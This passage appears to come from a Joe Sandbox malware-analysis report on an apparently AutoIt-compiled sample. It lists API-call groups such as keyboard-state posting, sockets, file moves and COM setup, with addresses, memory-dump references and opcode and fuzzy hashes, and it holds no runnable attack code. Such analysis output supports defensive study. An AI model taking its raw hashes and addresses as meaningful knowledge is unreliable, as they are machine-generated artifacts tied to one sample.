                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
                                                                                                                        • Instruction ID: e212c30a210cf7aa27542c3ff9acd9c788ff0629e0f630f1785aae49e8fb743c
                                                                                                                        • Opcode Fuzzy Hash: ea2bc0b084ce332786ab556cd7c5520075d54c1e45639393e8a50dd1be2c80e2
                                                                                                                        • Instruction Fuzzy Hash: EE11EB3168930BBBA7119B54AC82CEA7F9CFF15754B10442FF608A6282D7707D417665
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00567452
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00567469
                                                                                                                        • GetWindowDC.USER32(?), ref: 00567475
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00567484
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00567496
                                                                                                                        • GetSysColor.USER32(00000005), ref: 005674B0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 272304278-2594219639
                                                                                                                        • Opcode ID: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
                                                                                                                        • Instruction ID: d1812f9935a0adfe8a119fd6e5cfcef09dae11d2db8d67be07d1dd61e9215de1
                                                                                                                        • Opcode Fuzzy Hash: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
                                                                                                                        • Instruction Fuzzy Hash: 71018B31400219EFDB109F64DD08BAA7FB5FF19312F1004A0FA16A31A0CF311E45EB50
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 952045576-0
                                                                                                                        • Opcode ID: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
                                                                                                                        • Instruction ID: fd9260e992b1fcecdb2533b2e0b1c8fb117d3ad969f22688c65896332eea0067
                                                                                                                        • Opcode Fuzzy Hash: 91c284f149294394141a96bf077773e97512e10061c01fc198e0c790f3d07584
                                                                                                                        • Instruction Fuzzy Hash: 80418466C1021975CB11EBB4988EACF7BBCBF89710F508466F518E3122FB34E255C7A5
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0052F953
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F3D1
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 0056F454
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
                                                                                                                        • Instruction ID: 07321a2e70d98a1bac38aea76dd3c6b95a3245066138fbfcc962061d945a9381
                                                                                                                        • Opcode Fuzzy Hash: 555f59884f08ed50073d300ce7ac90860e5ff693b2ecf81badc99e52699361ac
                                                                                                                        • Instruction Fuzzy Hash: FB410B31608690BAC7398B2DF88872A7FB1BF97314F14483CE087576E1D631A8C4DB11
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
                                                                                                                        • Instruction ID: ce476ce3a50280507b72a00b44a597f3a5bb3df3f37a3004d0808bb695d88dfd
                                                                                                                        • Opcode Fuzzy Hash: 70b45551231ea2c49f2181fb741abaf3fd90eb8826f5753e55158a43b827ec74
                                                                                                                        • Instruction Fuzzy Hash: 82212961644E0A77D2185521AD96FFE3F5CFF61394F448420FD0E9A581FBA0EE1092E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        • API String ID: 0-572801152
                                                                                                                        • Opcode ID: 40fe074d7c96079ec33c2b19fe254e8f9c9c7c35940ae0b13f3c50b0ed85bb09
                                                                                                                        • Instruction ID: 4994603213440e1249d98e5c545af81e94d688fc66b64a5b5c8d9e703bc23fe2
                                                                                                                        • Opcode Fuzzy Hash: 40fe074d7c96079ec33c2b19fe254e8f9c9c7c35940ae0b13f3c50b0ed85bb09
                                                                                                                        • Instruction Fuzzy Hash: A9D1E271A0060AAFDF11CFA8C885FAEBBB5FF48344F148469E915AB281E770DD55CB90
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,005517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 005515CE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551651
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,005517FB,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516E4
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 005516FB
                                                                                                                          • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,005517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00551777
                                                                                                                        • __freea.LIBCMT ref: 005517A2
                                                                                                                        • __freea.LIBCMT ref: 005517AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2829977744-0
                                                                                                                        • Opcode ID: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
                                                                                                                        • Instruction ID: c04c13829556676bdde93f596624673d63ad07e03a4ba3af2b3dd2827bf6d391
                                                                                                                        • Opcode Fuzzy Hash: e8304211e53872cf78084dfc1e33bd3c4004e3408b64d64a4d2f45e1bf780cc9
                                                                                                                        • Instruction Fuzzy Hash: 9D91C671E10A165ADB208E78C8A5BEE7FB5FF49315F18055AEC02E7141EB35DC48CB68
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                        • Opcode ID: 12d10ab3524c7838255f63b06f75f76252958286bd28974099c1cbd6ba9c7582
                                                                                                                        • Instruction ID: 41213f7b4867b2642b7d579067c4a1d108a3a7272f84ede0c31922d5a4a1301b
                                                                                                                        • Opcode Fuzzy Hash: 12d10ab3524c7838255f63b06f75f76252958286bd28974099c1cbd6ba9c7582
                                                                                                                        • Instruction Fuzzy Hash: B5917E71A00219ABDF24CFA4D848FAEBFB8FF46715F108559E505AB280D7709D46CFA0
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0058125C
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00581284
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005812A8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005812D8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0058135F
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005813C4
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00581430
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ArraySafe$Data$Access$UnaccessVartype
• String ID:
• API String ID: 2550207440-0
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• VariantInit.OLEAUT32(?), ref: 0059396B
• CharUpperBuffW.USER32(?,?), ref: 00593A7A
• _wcslen.LIBCMT ref: 00593A8A
• VariantClear.OLEAUT32(?), ref: 00593C1F
  • Part of subcall function 00580CDF: VariantInit.OLEAUT32(00000000), ref: 00580D1F
  • Part of subcall function 00580CDF: VariantCopy.OLEAUT32(?,?), ref: 00580D28
  • Part of subcall function 00580CDF: VariantClear.OLEAUT32(?), ref: 00580D34
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
APIs
  • Part of subcall function 0057000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
  • Part of subcall function 0057000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
  • Part of subcall function 0057000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
  • Part of subcall function 0057000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00594C51
• _wcslen.LIBCMT ref: 00594D59
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00594DCF
• CoTaskMemFree.OLE32(?), ref: 00594DDA
Strings
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
APIs
• GetMenu.USER32(?), ref: 005A2183
• GetMenuItemCount.USER32(00000000), ref: 005A21B5
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005A21DD
• _wcslen.LIBCMT ref: 005A2213
• GetMenuItemID.USER32(?,?), ref: 005A224D
• GetSubMenu.USER32(?,?), ref: 005A225B
  • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
  • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
  • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A22E3
  • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
APIs
• GetParent.USER32(?), ref: 0057AEF9
• GetKeyboardState.USER32(?), ref: 0057AF0E
• SetKeyboardState.USER32(?), ref: 0057AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0057AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0057AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0057AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0057B020
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 0057AD19
• GetKeyboardState.USER32(?), ref: 0057AD2E
• SetKeyboardState.USER32(?), ref: 0057AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0057ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0057ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0057AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0057AE38
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetConsoleCP.KERNEL32(00553CD6,?,?,?,?,?,?,?,?,00545BA3,?,?,00553CD6,?,?), ref: 00545470
• __fassign.LIBCMT ref: 005454EB
• __fassign.LIBCMT ref: 00545506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00553CD6,00000005,00000000,00000000), ref: 0054552C
• WriteFile.KERNEL32(?,00553CD6,00000000,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 0054554B
• WriteFile.KERNEL32(?,?,00000001,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 00545584
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
                                                                                                                        • Instruction ID: 24808c6eb1eebcecf855a58c8dca5a9990f6fc865d75660e9bc5a7327662084e
                                                                                                                        • Opcode Fuzzy Hash: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
                                                                                                                        • Instruction Fuzzy Hash: 4B51E270A00649AFDB11CFA8D885AEEBFF9FF09304F14451AF955E7292E7309A41CB60
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 005A6C33
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 005A6C4A
                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005A6C73
                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0058AB79,00000000,00000000), ref: 005A6C98
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005A6CC7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3688381893-2594219639
                                                                                                                        • Opcode ID: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
                                                                                                                        • Instruction ID: 3b39315b6169eefebab93b79cc03f7a843ee7e4f72620e3c0e304cce5329afcd
                                                                                                                        • Opcode Fuzzy Hash: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
                                                                                                                        • Instruction Fuzzy Hash: CF418035A04104AFD724DF28CC68BAD7FA5FB0B360F190268F995AB2A1C771AD41DA50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                                                                                          • Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00591112
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591121
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 005911C9
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 005911F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2675159561-0
                                                                                                                        • Opcode ID: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
                                                                                                                        • Instruction ID: 04beafee710abd91a90cd2a77743609229ea6634105e9c3ca98ffbced2de8dcd
                                                                                                                        • Opcode Fuzzy Hash: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
                                                                                                                        • Instruction Fuzzy Hash: 7C412531600616AFEB109F14C888BA9BFE9FF85324F148059FD169B291C774ED85DBE4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0057CF45
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0057CF7F
                                                                                                                        • _wcslen.LIBCMT ref: 0057D005
                                                                                                                        • _wcslen.LIBCMT ref: 0057D01B
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0057D061
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                        • Opcode ID: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
                                                                                                                        • Instruction ID: ada66f8667195852e43d9519554c622855c0565a0c124dc18f69882a95181e2f
                                                                                                                        • Opcode Fuzzy Hash: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
                                                                                                                        • Instruction Fuzzy Hash: FA4158719052195FDF12EFA4D985BDD7FB8BF49340F0040E6E509E7141EA34A688DB50
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577769
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0057778F
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00577792
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 005777B0
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 005777B9
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 005777DE
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 005777EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
